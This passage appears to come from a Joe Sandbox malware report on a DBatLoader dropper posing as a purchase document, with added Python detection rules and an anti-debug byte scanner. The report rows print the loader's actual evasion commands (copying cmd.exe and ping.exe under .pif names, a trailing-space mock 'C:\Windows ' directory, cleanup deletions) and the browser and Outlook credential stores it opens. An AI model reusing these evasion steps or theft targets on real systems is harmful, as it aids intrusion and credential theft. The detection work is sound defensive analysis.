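# Constructed buffer: one real BeingDebugged check, one benign Ldr walk, two import names.
SAMPLE = (
    b"\x55\x8b\xec"                      # push ebp; mov ebp, esp
    + b"\x64\xa1\x30\x00\x00\x00"        # mov eax, fs:[30h]            -> PEB
    + b"\x0f\xb6\x40\x02"                # movzx eax, byte ptr [eax+2]  -> PEB.BeingDebugged
    + b"\x85\xc0\x75\x05"                # test eax, eax ; jnz +5
    + b"\x64\x8b\x05\x30\x00\x00\x00"    # mov eax, fs:[30h]            -> PEB again
    + b"\x8b\x40\x0c"                    # mov eax, [eax+0Ch]           -> PEB.Ldr
    + b"\xc3"                            # ret
    + b"KERNEL32.dll\x00IsDebuggerPresent\x00CheckRemoteDebuggerPresent\x00"
)

# Constructed control: the same fs:[30h] load followed only by an Ldr walk.
BENIGN_PEB_WALK = b"\x64\xa1\x30\x00\x00\x00\x8b\x40\x0c\xc3"

if __name__ == "__main__":
    for hit in scan(SAMPLE):
        print("0x%04x  %-26s %s" % hit)
    print(verdict(SAMPLE), verdict(BENIGN_PEB_WALK))
```

Feed it a dumped section or an unpacked region rather than the packed file; in this report the relevant code only exists after hollowing, which is why the sandbox attributes the fs:[30h] reads to ymafvvdS.pif and alpha.pif rather than to the dropper on disk.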

                  HIPS / PFW / Operating System Protection Evasion

                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exe :: Memory allocated: C:\Users\Public\Libraries\ymafvvdS.pif base: 400000 protect: page execute and read and write
                  Source: C:\Windows\SysWOW64\esentutl.exe :: File created: C:\Users\Public\alpha.pif
                  Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe :: NtOpenKeyEx: Indirect: 0x140077B9B
                  Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe :: NtQueryValueKey: Indirect: 0x140077C9F
                  Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe :: NtClose: Indirect: 0x140077E81
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exe :: Section unmapped: C:\Users\Public\Libraries\ymafvvdS.pif base address: 400000
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exe :: Memory written: C:\Users\Public\Libraries\ymafvvdS.pif base: 2A5008
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exe :: Process created: C:\Users\Public\Libraries\ymafvvdS.pif C:\Users\Public\Libraries\ymafvvdS.pif
                  Source: C:\Windows\SysWOW64\cmd.exe :: Process created: C:\Windows\SysWOW64\esentutl.exe C:\\Windows\\System32\\esentutl /y C:\\Windows\\System32\\cmd.exe /d C:\\Users\\Public\\alpha.pif /o
                  Source: C:\Windows\SysWOW64\cmd.exe :: Process created: C:\Windows\SysWOW64\esentutl.exe C:\\Windows\\System32\\esentutl /y C:\\Windows\\System32\\ping.exe /d C:\\Users\\Public\\xpha.pif /o
                  Source: C:\Windows\SysWOW64\cmd.exe :: Process created: C:\Users\Public\alpha.pif C:\\Users\\Public\\alpha.pif /c mkdir "\\?\C:\Windows "
                  Source: C:\Windows\SysWOW64\cmd.exe :: Process created: C:\Users\Public\alpha.pif C:\\Users\\Public\\alpha.pif /c mkdir "\\?\C:\Windows \SysWOW64"
                  Source: C:\Windows\SysWOW64\cmd.exe :: Process created: C:\Users\Public\alpha.pif C:\\Users\\Public\\alpha.pif /c C:\\Users\\Public\\xpha.pif 127.0.0.1 -n 10
                  Source: C:\Windows\SysWOW64\cmd.exe :: Process created: C:\Users\Public\alpha.pif C:\\Users\\Public\\alpha.pif /c del "C:\Users\Public\xpha.pif"
                  Source: C:\Windows\SysWOW64\cmd.exe :: Process created: C:\Users\Public\alpha.pif C:\\Users\\Public\\alpha.pif /c rmdir "C:\Windows \SysWOW64
                  Source: C:\Windows\SysWOW64\cmd.exe :: Process created: C:\Users\Public\alpha.pif C:\\Users\\Public\\alpha.pif /c rmdir "C:\Windows \"
                  Source: C:\Users\Public\alpha.pif :: Process created: C:\Users\Public\xpha.pif C:\\Users\\Public\\xpha.pif 127.0.0.1 -n 10
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exe :: Code function: 0_2_02B15ACC GetModuleFileNameA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegQueryValueExA,RegQueryValueExA,RegCloseKey,lstrcpynA,GetThreadLocale,GetLocaleInfoA,lstrlenA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exe :: Code function: 0_2_02B1A7C4 GetLocaleInfoA
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exe :: Code function: 0_2_02B15BD8 lstrcpynA,GetThreadLocale,GetLocaleInfoA,lstrlenA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exe :: Code function: 0_2_02B1A810 GetLocaleInfoA
                  Source: C:\Users\Public\Libraries\ymafvvdS.pif :: Code function: 9_1_00417A20 GetLocaleInfoA
                  Source: C:\Users\Public\alpha.pif :: Code function: 13_2_00198572 GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,setlocale
                  Source: C:\Users\Public\alpha.pif :: Code function: 13_2_00196854 GetSystemTime,SystemTimeToFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,GetLocaleInfoW,GetDateFormatW,memmove,GetDateFormatW,realloc,GetDateFormatW,memmove,GetLastError,GetLastError,realloc
                  Source: C:\Users\Public\alpha.pif :: Code function: 13_2_00199310 GetSystemTime,SystemTimeToFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,GetLocaleInfoW,memmove,GetTimeFormatW
                  Source: C:\Users\Public\alpha.pif :: Code function: 22_2_00198572 GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,setlocale
                  Source: C:\Users\Public\alpha.pif :: Code function: 22_2_00196854 GetSystemTime,SystemTimeToFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,GetLocaleInfoW,GetDateFormatW,memmove,GetDateFormatW,realloc,GetDateFormatW,memmove,GetLastError,GetLastError,realloc
                  Source: C:\Users\Public\alpha.pif :: Code function: 22_2_00199310 GetSystemTime,SystemTimeToFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,GetLocaleInfoW,memmove,GetTimeFormatW
                  Source: C:\Windows\SysWOW64\cmd.exe :: Queries volume information: C:\ VolumeInformation (8 events)
                  Source: C:\Users\Public\Libraries\ymafvvdS.pif :: Queries volume information: C:\ VolumeInformation
                  Source: C:\Users\Public\Libraries\ymafvvdS.pif :: Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                  Source: C:\Users\Public\Libraries\ymafvvdS.pif :: Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                  Source: C:\Users\Public\Libraries\ymafvvdS.pif :: Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
                  Source: C:\Users\Public\Libraries\ymafvvdS.pif :: Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
                  Source: C:\Users\Public\Libraries\ymafvvdS.pif :: Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                  Source: C:\Users\Public\Libraries\ymafvvdS.pif :: Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                  Source: C:\Windows\System32\alg.exe :: Queries volume information: C:\ VolumeInformation
                  Source: C:\Windows\System32\AppVClient.exe :: Queries volume information: C:\ VolumeInformation
                  Source: C:\Users\Public\alpha.pif :: Queries volume information: C:\ VolumeInformation
                  Source: C:\Windows\System32\FXSSVC.exe :: Queries volume information: C:\ VolumeInformation
                  Source: C:\Windows\System32\FXSSVC.exe :: Queries volume information: C:\ProgramData\Microsoft\Windows NT\MSFax\Queue\TST55B8.tmp VolumeInformation
                  Source: C:\Windows\System32\FXSSVC.exe :: Queries volume information: C:\ProgramData\Microsoft\Windows NT\MSFax\TST55B9.tmp VolumeInformation
                  Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe :: Queries volume information: C:\ VolumeInformation
                  Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe :: Queries volume information: C:\ VolumeInformation
                  Source: C:\Windows\System32\msdtc.exe :: Queries volume information: C:\ VolumeInformation
                  Source: C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exe :: Queries volume information: C:\ VolumeInformation
                  Source: C:\Windows\System32\Locator.exe :: Queries volume information: C:\ VolumeInformation
                  Source: C:\Windows\System32\SensorDataService.exe :: Queries volume information: C:\ VolumeInformation
                  Source: C:\Windows\System32\snmptrap.exe :: Queries volume information: C:\ VolumeInformation
                  Source: C:\Windows\System32\Spectrum.exe :: Queries volume information: C:\ VolumeInformation
                  Source: C:\Windows\System32\OpenSSH\ssh-agent.exe :: Queries volume information: C:\ VolumeInformation
                  Source: C:\Windows\System32\TieringEngineService.exe :: Queries volume information: C:\ VolumeInformation
                  Source: C:\Windows\System32\AgentService.exe :: Queries volume information: C:\ VolumeInformation
                  Source: C:\Windows\System32\vds.exe :: Queries volume information: C:\ VolumeInformation
                  Source: C:\Windows\System32\TieringEngineService.exe :: Key value queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\TimeZoneInformation Bias
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exe :: Code function: 0_2_02B1920C GetLocalTime
                  Source: C:\Windows\System32\alg.exe :: Code function: 12_2_004C0080 VirtualFree,VirtualFree,VirtualAlloc,GetUserNameW,GetComputerNameW,GetComputerNameW
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exe :: Code function: 0_2_02B1B78C GetVersionExA
                  Source: C:\Users\Public\Libraries\ymafvvdS.pif :: Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
                  Source: PURCHASE REQUIRED DETAILS 000487958790903403.exe, 00000000.00000003.1539296303.000000007E230000.00000004.00001000.00020000.00000000.sdmp, PURCHASE REQUIRED DETAILS 000487958790903403.exe, 00000000.00000003.1539296303.000000007E2B7000.00000004.00001000.00020000.00000000.sdmp, PURCHASE REQUIRED DETAILS 000487958790903403.exe, 00000000.00000002.1639818443.000000007EAA7000.00000004.00001000.00020000.00000000.sdmp, PURCHASE REQUIRED DETAILS 000487958790903403.exe, 00000000.00000003.1539867731.000000007FCC0000.00000004.00001000.00020000.00000000.sdmp :: Binary or memory strings: cmdagent.exe, quhlpsvc.exe, avgamsvr.exe, TMBMSRV.exe, Vsserv.exe, avgupsvc.exe, avgemc.exe, MsMpEng.exe
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exe :: WMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter2 : AntiVirusProduct (2 events)
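The process rows above show the whole evasion chain in clear text: esentutl /y <src> /d <dst> /o copies cmd.exe and ping.exe into C:\Users\Public under .pif names, the renamed cmd.exe creates "C:\Windows \SysWOW64" with a trailing space (a directory that Win32 path normalisation would otherwise never allow, which is why the \\?\ prefix is used, and which later shows up as a trusted-looking path), and the renamed ping.exe provides a ten-second sleep before the cleanup. The Python below is an added example, not part of the Joe Sandbox report: four rules over process-creation events that catch each of those steps. SAMPLE_EVENTS reuses the command lines from the rows above (with Joe Sandbox's doubled backslashes left in, which normalize() collapses) plus two constructed benign controls; the event shape (image, cmdline) is an assumption modelled on a Sysmon Event ID 1 record, not a real log format.

```python
"""Detection rules for the process chain recorded in the rows above.

Added example, not part of the Joe Sandbox report. The command lines in
SAMPLE_EVENTS are copied from the report's "Process created" rows (doubled
backslashes as printed by Joe Sandbox); the {"image", "cmdline"} event shape
is an assumption modelled on Sysmon Event ID 1, and the two benign controls
at the end are constructed.
"""
import re

SYSTEM_DIRS = ("c:\\windows\\system32\\", "c:\\windows\\syswow64\\")
USER_WRITABLE = ("c:\\users\\public\\", "c:\\programdata\\")
COPY_LOLBINS = {"esentutl.exe", "esentutl"}       # copy-capable system utilities
RENAMED_EXTENSIONS = {".pif", ".scr", ".com"}     # a PE runs whatever it is called
DOTTED_QUAD = re.compile(r"\d{1,3}(\.\d{1,3}){3}")


def normalize(path):
    """Drop the \\\\?\\ extended-length prefix, collapse doubled backslashes, lowercase."""
    if path.startswith("\\\\?\\"):
        path = path[4:]
    return path.replace("\\\\", "\\").lower()


def split_cmdline(cmdline):
    """Split on whitespace outside double quotes, keeping a quoted trailing space."""
    tokens, current, quoted = [], [], False
    for ch in cmdline:
        if ch == '"':
            quoted = not quoted
        elif ch.isspace() and not quoted:
            if current:
                tokens.append("".join(current))
                current = []
        else:
            current.append(ch)
    if current:
        tokens.append("".join(current))
    return tokens


def basename(path):
    return path.rsplit("\\", 1)[-1]


def extension(path):
    name = basename(path)
    return name[name.rfind("."):] if "." in name else ""


def in_dirs(path, dirs):
    return any(path.startswith(d) for d in dirs)


def arg_after(tokens, switch):
    """Value following a switch such as /y or /d, or None when absent."""
    if switch in tokens and tokens.index(switch) + 1 < len(tokens):
        return tokens[tokens.index(switch) + 1]
    return None


def has_trailing_space_component(path):
    """True for 'c:\\windows \\syswow64': a directory name that ends in a space."""
    return any(part != part.rstrip(" ") for part in path.split("\\"))


def detect(event):
    """Return the names of the rules that fire for one process-creation event."""
    image = normalize(event["image"])
    tokens = [normalize(t) for t in split_cmdline(event["cmdline"])]
    args, findings = tokens[1:], []
    # 1. esentutl /y <src> /d <dst>: System32 binary copied to a user-writable dir or renamed
    if basename(image) in COPY_LOLBINS:
        src, dst = arg_after(tokens, "/y"), arg_after(tokens, "/d")
        if src and dst and in_dirs(src, SYSTEM_DIRS) and (
                in_dirs(dst, USER_WRITABLE) or extension(dst) != extension(src)):
            findings.append("lolbin_copy")
    # 2. a directory name ending in a space ("C:\Windows ") mimics a trusted path;
    #    Win32 strips trailing spaces, so it only exists via the \\?\ prefix, never by typo
    if any(has_trailing_space_component(a) for a in args):
        findings.append("trailing_space_path")
    # 3. a .pif/.scr/.com image executing out of C:\Users\Public is a renamed binary
    if extension(image) in RENAMED_EXTENSIONS and in_dirs(image, USER_WRITABLE):
        findings.append("renamed_binary_in_public")
    # 4. ping syntax (address plus -n count) handed to an image that is not ping.exe
    if ("-n" in args and any(DOTTED_QUAD.fullmatch(a) for a in args)
            and basename(image) != "ping.exe"):
        findings.append("ping_syntax_non_ping_image")
    return findings


SAMPLE_EVENTS = [
    {"image": r"C:\Windows\SysWOW64\esentutl.exe",   # report row: cmd.exe -> alpha.pif
     "cmdline": r"C:\\Windows\\System32\\esentutl /y C:\\Windows\\System32\\cmd.exe /d C:\\Users\\Public\\alpha.pif /o"},
    {"image": r"C:\Windows\SysWOW64\esentutl.exe",   # report row: ping.exe -> xpha.pif
     "cmdline": r"C:\\Windows\\System32\\esentutl /y C:\\Windows\\System32\\ping.exe /d C:\\Users\\Public\\xpha.pif /o"},
    {"image": r"C:\Users\Public\alpha.pif",          # report row: trailing-space directory
     "cmdline": r'C:\\Users\\Public\\alpha.pif /c mkdir "\\?\C:\Windows \SysWOW64" '},
    {"image": r"C:\Users\Public\xpha.pif",           # report row: renamed ping as a sleep
     "cmdline": r"C:\\Users\\Public\\xpha.pif 127.0.0.1 -n 10"},
    {"image": r"C:\Windows\System32\cmd.exe",        # constructed benign control
     "cmdline": r'cmd.exe /c dir "C:\Program Files"'},
    {"image": r"C:\Windows\System32\PING.EXE",       # constructed benign control
     "cmdline": r"ping 127.0.0.1 -n 10"},
]

if __name__ == "__main__":
    for event in SAMPLE_EVENTS:
        print(detect(event) or ["-"], event["cmdline"])
```

Rule 2 is the one worth keeping even if the others are tuned away: a quoted path component ending in a space has no legitimate origin in interactive or scripted Windows use, so it can run at zero tolerance, whereas rules 1, 3 and 4 each need the directory and extension lists adjusted to the environment.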

                  Stealing of Sensitive Information

                  Source: Yara match :: File source: 9.3.ymafvvdS.pif.24742da8.17.raw.unpack, type: UNPACKEDPE
                  Source: Yara match :: File source: 9.3.ymafvvdS.pif.24590000.925.unpack, type: UNPACKEDPE
                  Source: Yara match :: File source: 9.3.ymafvvdS.pif.24742da8.17.unpack, type: UNPACKEDPE
                  Source: Yara match :: File source: 00000009.00000003.1577655247.0000000024742000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match :: File source: Process Memory Space: ymafvvdS.pif PID: 7996, type: MEMORYSTR
                  Source: Yara match :: File source: 9.3.ymafvvdS.pif.24742da8.17.raw.unpack, type: UNPACKEDPE
                  Source: Yara match :: File source: 9.3.ymafvvdS.pif.24590000.925.unpack, type: UNPACKEDPE
                  Source: Yara match :: File source: 9.3.ymafvvdS.pif.24742da8.17.unpack, type: UNPACKEDPE
                  Source: Yara match :: File source: 00000009.00000003.1577655247.0000000024742000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: C:\Users\Public\Libraries\ymafvvdS.pif :: File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                  Source: C:\Users\Public\Libraries\ymafvvdS.pif :: File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                  Source: C:\Users\Public\Libraries\ymafvvdS.pif :: Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676

                  Remote Access Functionality

                  Source: Yara match | File source: 9.3.ymafvvdS.pif.24742da8.17.raw.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 9.3.ymafvvdS.pif.24590000.925.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 9.3.ymafvvdS.pif.24742da8.17.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 00000009.00000003.1577655247.0000000024742000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: Process Memory Space: ymafvvdS.pif PID: 7996, type: MEMORYSTR
                  Source: Yara match | File source: 9.3.ymafvvdS.pif.24742da8.17.raw.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 9.3.ymafvvdS.pif.24590000.925.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 9.3.ymafvvdS.pif.24742da8.17.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 00000009.00000003.1577655247.0000000024742000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                  Gather Victim Identity InformationAcquire Infrastructure1
                  Valid Accounts
                  1
                  Windows Management Instrumentation
                  2
                  LSASS Driver
                  1
                  Abuse Elevation Control Mechanism
                  11
                  Disable or Modify Tools
                  1
                  OS Credential Dumping
                  11
                  System Time Discovery
                  1
                  Taint Shared Content
                  1
                  Archive Collected Data
                  1
                  Ingress Tool Transfer
                  Exfiltration Over Other Network MediumAbuse Accessibility Features
                  CredentialsDomainsDefault Accounts3
                  Native API
                  1
                  DLL Side-Loading
                  2
                  LSASS Driver
                  1
                  Deobfuscate/Decode Files or Information
                  LSASS Memory1
                  Account Discovery
                  Remote Desktop Protocol1
                  Data from Local System
                  11
                  Encrypted Channel
                  Exfiltration Over BluetoothNetwork Denial of Service
                  Email AddressesDNS ServerDomain Accounts1
                  Shared Modules
                  1
                  Valid Accounts
                  1
                  DLL Side-Loading
                  1
                  Abuse Elevation Control Mechanism
                  Security Account Manager1
                  System Network Connections Discovery
                  SMB/Windows Admin Shares1
                  Email Collection
                  1
                  Non-Standard Port
                  Automated ExfiltrationData Encrypted for Impact
                  Employee NamesVirtual Private ServerLocal Accounts2
                  Command and Scripting Interpreter
                  1
                  Registry Run Keys / Startup Folder
                  1
                  Valid Accounts
                  3
                  Obfuscated Files or Information
                  NTDS2
                  File and Directory Discovery
                  Distributed Component Object ModelInput Capture3
                  Non-Application Layer Protocol
                  Traffic DuplicationData Destruction
                  Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script1
                  Access Token Manipulation
                  2
                  Software Packing
                  LSA Secrets36
                  System Information Discovery
                  SSHKeylogging124
                  Application Layer Protocol
                  Scheduled TransferData Encrypted for Impact
                  Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC Scripts311
                  Process Injection
                  1
                  Timestomp
                  Cached Domain Credentials1
                  Query Registry
                  VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                  DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup Items1
                  Registry Run Keys / Startup Folder
                  1
                  DLL Side-Loading
                  DCSync361
                  Security Software Discovery
                  Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                  Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
                  File Deletion
                  Proc Filesystem41
                  Virtualization/Sandbox Evasion
                  Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                  Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt532
                  Masquerading
                  /etc/passwd and /etc/shadow2
                  Process Discovery
                  Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                  IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron1
                  Valid Accounts
                  Network Sniffing1
                  Application Window Discovery
                  Shared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
                  Network Security AppliancesDomainsCompromise Software Dependencies and Development ToolsAppleScriptLaunchdLaunchd1
                  Access Token Manipulation
                  Input Capture1
                  System Owner/User Discovery
                  Software Deployment ToolsRemote Data StagingMail ProtocolsExfiltration Over Unencrypted Non-C2 ProtocolFirmware Corruption
                  Gather Victim Org InformationDNS ServerCompromise Software Supply ChainWindows Command ShellScheduled TaskScheduled Task41
                  Virtualization/Sandbox Evasion
                  Keylogging1
                  System Network Configuration Discovery
                  Taint Shared ContentScreen CaptureDNSExfiltration Over Physical MediumResource Hijacking
                  Determine Physical LocationsVirtual Private ServerCompromise Hardware Supply ChainUnix ShellSystemd TimersSystemd Timers311
                  Process Injection
                  GUI Input CapturePermission Groups DiscoveryReplication Through Removable MediaEmail CollectionProxyExfiltration over USBNetwork Denial of Service

                  Legend:

                  • Process
                  • Signature
                  • Created File
                  • DNS/IP Info
                  • Is Dropped
                  • Is Windows Process
                  • Number of created Registry Values
                  • Number of created Files
                  • Visual Basic
                  • Delphi
                  • Java
                  • .Net C# or VB.NET
                  • C, C++ or other language
                  • Is malicious
                  • Internet
                  Behavior Graph (ID: 1572131; Sample: PURCHASE REQUIRED DETAILS 0...; Startdate: 10/12/2024; Architecture: WINDOWS; Score: 100)

                  Start
                    DNS/IP: reallyfreegeoip.org (Tries to detect the country of the analysis system (by using the IP)); ww7.przvgke.biz; 19 other IPs or domains
                    Signatures: Suricata IDS alerts for network traffic; Found malware configuration; Malicious sample detected (through community Yara rule); 17 other signatures
                    Started processes:
                      PURCHASE REQUIRED DETAILS 000487958790903403.exe (1 7)
                        DNS/IP: lwaziacademy.com 41.185.8.252, 443, 49706, 49707 GridhostZA South Africa
                        Created files: C:\Users\Public\Libraries\ymafvvdS.pif, PE32 (dropped); C:\Users\Public\Sdvvfamy.url, MS (dropped)
                        Signatures: Writes to foreign memory regions; Allocates memory in foreign processes; Sample uses process hollowing technique; Allocates many large memory junks
                        Started processes:
                          ymafvvdS.pif (15 3)
                            DNS/IP: checkip.dyndns.com 158.101.44.242, 49710, 80 ORACLE-BMC-31898US United States; ww99.przvgke.biz 72.52.179.174, 49722, 49727, 49728 LIQUIDWEBUS United States; 8 other IPs or domains
                            Created files: C:\Windows\System32\wbengine.exe, PE32+ (dropped); C:\Windows\System32\wbem\WmiApSrv.exe, PE32+ (dropped); C:\Windows\System32\vds.exe, PE32+ (dropped); 150 other malicious files (dropped)
                            Signatures: Tries to steal Mail credentials (via file / registry access); Tries to harvest and steal browser information (history, passwords, etc); Drops executable to a common third party application directory; Infects executable files (exe, dll, sys, html)
                          cmd.exe (1)
                            Started processes:
                              esentutl.exe (2)
                                Created files: C:\Users\Public\alpha.pif, PE32 (dropped)
                                Signatures: Drops PE files to the user root directory; Drops PE files with a suspicious file extension; Drops or copies cmd.exe with a different name (likely to bypass HIPS)
                              alpha.pif
                                Started processes:
                                  xpha.pif
                                    DNS/IP: 127.0.0.1 unknown unknown
                              esentutl.exe
                                Created files: C:\Users\Public\xpha.pif, PE32 (dropped)
                              6 other processes
                          esentutl.exe (1)
                            Started processes:
                              conhost.exe
                      alg.exe
                        DNS/IP: 084725.parkingcrew.net 13.248.148.254, 49729, 80 AMAZON-02US United States
                        Signatures: Creates files in the system32 config directory; Contains functionality to behave differently if execute on a Russian/Kazak computer
                      AppVClient.exe
                      18 other processes
                        Signatures: Creates files inside the volume driver (system volume information); Found direct / indirect Syscall (likely to bypass EDR)

                  Source | Detection | Scanner | Label
                  PURCHASE REQUIRED DETAILS 000487958790903403.exe | 37% | ReversingLabs | Win32.Trojan.DBatLoader
                  PURCHASE REQUIRED DETAILS 000487958790903403.exe | 43% | Virustotal | -
                  PURCHASE REQUIRED DETAILS 000487958790903403.exe | 100% | Avira | HEUR/AGEN.1326062
                  Source | Detection | Scanner | Label
                  C:\Program Files (x86)\Java\jre-1.8\bin\java-rmi.exe | 100% | Avira | W32/Infector.Gen
                  C:\Program Files (x86)\Common Files\Java\Java Update\jucheck.exe | 100% | Avira | W32/Infector.Gen
                  C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler64.exe | 100% | Avira | W32/Infector.Gen
                  C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler.exe | 100% | Avira | W32/Infector.Gen
                  C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exe | 100% | Avira | W32/Infector.Gen
                  C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaw.exe | 100% | Avira | W32/Infector.Gen
                  C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exe | 100% | Avira | W32/Infector.Gen
                  C:\Program Files (x86)\AutoIt3\Au3Check.exe | 100% | Avira | W32/Infector.Gen
                  C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdate.exe | 100% | Avira | W32/Infector.Gen
                  C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe | 100% | Avira | W32/Infector.Gen
                  C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe_x64.exe | 100% | Avira | W32/Infector.Gen
                  C:\Program Files (x86)\AutoIt3\AutoIt3_x64.exe | 100% | Avira | W32/Infector.Gen
                  C:\Program Files (x86)\Java\jre-1.8\bin\javacpl.exe | 100% | Avira | W32/Infector.Gen
                  C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaw.exe | 100% | Avira | W32/Infector.Gen
                  C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe | 100% | Avira | W32/Infector.Gen
                  C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateOnDemand.exe | 100% | Avira | W32/Infector.Gen
                  C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateCore.exe | 100% | Avira | W32/Infector.Gen
                  C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe.exe | 100% | Avira | W32/Infector.Gen
                  C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaws.exe | 100% | Avira | W32/Infector.Gen
                  C:\Program Files (x86)\Common Files\Java\Java Update\jaureg.exe | 100% | Avira | W32/Infector.Gen
                  C:\Program Files (x86)\Google\Update\Download\{8A69D345-D564-463C-AFF1-A69D9E530F96}\117.0.5938.134\117.0.5938.134_117.0.5938.132_chrome_updater.exe | 100% | Avira | W32/Infector.Gen
                  C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateBroker.exe | 100% | Avira | W32/Infector.Gen
                  C:\Program Files (x86)\AutoIt3\Au3Info.exe | 100% | Avira | W32/Infector.Gen
                  C:\Program Files (x86)\Java\jre-1.8\bin\jabswitch.exe | 100% | Avira | W32/Infector.Gen
                  C:\Program Files (x86)\AutoIt3\AutoIt3Help.exe | 100% | Avira | W32/Infector.Gen
